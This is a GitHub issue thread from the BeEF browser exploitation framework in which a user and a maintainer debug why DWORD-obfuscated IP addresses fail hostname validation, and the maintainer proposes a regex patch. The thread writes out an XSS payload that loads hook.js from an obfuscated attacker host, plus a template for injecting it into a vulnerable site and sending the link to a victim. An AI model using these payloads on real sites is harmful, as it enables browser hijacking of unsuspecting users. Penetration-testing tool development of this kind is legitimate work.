Error in Beef not understanding the encoded IP

[iBringsTheRuckus]

Hello,

I was trying some different ways to hide the IP address etc with BeEF in a real world scenario and I keep getting an error. "[2012-09-29 03:33:57] ERROR Invalid host name" This error happens when the XSS is successful and tries connection back to BeEF. I'm using a IP Obfuscation Calculator with DWord level 1 address like this <SCRIPT/SRC="http://6425673729/hook.js"> but BeEF doesn't seem to understand it and gives me the above error. I put the address "http://6425673729/ui/panel" into my browser and it loads fine as a test for the IP. I tried "http://6425673729/hook.js" in the browser and as an XSS and I get the error. It seems the problem is with BeEF understanding the IP. I have also tested octal address and that doesn't work either. I haven't tested hex address.

Here is the link to the calculator I'm using. It's at the bottom of the page. http://ha.ckers.org/xsscalc.html Here is a little more on the subject and how it's used. https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Dword_encoding

All testing was done on a windows system with the latest version of firefox.

[iBringsTheRuckus]

It doesn't allow me to show the script tags etc.

[antisnatchor]

That's a filtering rules we added. Have a look here: /beef/core/filters/http.rb, line 22, where the method to validate the hostname is given. It's not a blocking error, anyway.

What do you mean "It doesn't allow me to show the script tags etc."? If you mean in the admin web UI, it's because I'm doing output escaping on the data that is rendered.

[iBringsTheRuckus]

It would be nice to at least have the option from a penetration tester standpoint. Looking at the filtering since it's just all numbers should it be allowed even without . right?

[antisnatchor]

Nah, loos at the last 2 lines. return false if not (str =~ /../).nil? return false if not (str =~ /--/).nil?

but yes I will patch it, you are right. Even though I never considered the hostname encoded in that way to be an obfuscation technique :D

[iBringsTheRuckus]

Thanks a lot. Ya it seems quite nice since it's just a set of numbers at an http. =P Please let me know when it's ready to update. Thanks again!

[antisnatchor]

Wait a sec. Tried now in latest FF and Chrome.

In FF after hooking http://2130706433:3000/demos/basic.html I see no errors printed. In Chrome neither (even though in webkit that dword address is automatically translated to the original value).

Which environment do you have (victim browser)?

[iBringsTheRuckus]

FF 15.0.1. That's not good that chrome translates it. I might want to try other browsers with dword, hex, & octal. It works fine if you input it right into the browser. But say you use it as an XSS in a vulnerable site and hand the link to the victim. That is when I get the error. Give it a try in a vuln app. site.com/index.php?blah=ScriptHerehttp://dword/hook.jsCloseScript

[iBringsTheRuckus]

Did a little testing with it being put directly into the browser. Chrome does detect all 3 except dword with a value of 1 but it just doesn't work. Works on firefox and IE except Ie does translate it too. I did some thinking though and am thinking what if you use it like the above example in an XSS if it will actually translate it after it loads? I think it would also work great in something say a post on a message board. idk I guess I would have to do some testing after I update with the fix.

[antisnatchor]

Let me know how it goes mate, so I can push a final patch. To allow dword address is enough to add:

return true if (str =~ /^[0-9]/)

after line 25 of core/filters/http.rb

For the other encoding techniques we'll see.

[iBringsTheRuckus]

I still get the same error. ='(

[antisnatchor]

So 'is_valid_hostname?' is still returning false?

[wadealcorn]

Closing bug as there is no response and replication.

[iBringsTheRuckus]

Will do. Sry for the delay as my life has been a little fucked up lately. I'll check it out some time over the weekend. Thanks On Oct 1, 2012 3:36 AM, "Michele Orru" notifications@github.com wrote:

Let me know how it goes mate, so I can push a final patch. To allow dword address is enough to add:

return true if (str =~ /^[0-9]/)

after line 25 of core/filters/http.rb

For the other encoding techniques we'll see.

— Reply to this email directly or view it on GitHubhttps://github.com/beefproject/beef/issues/751#issuecomment-9024835.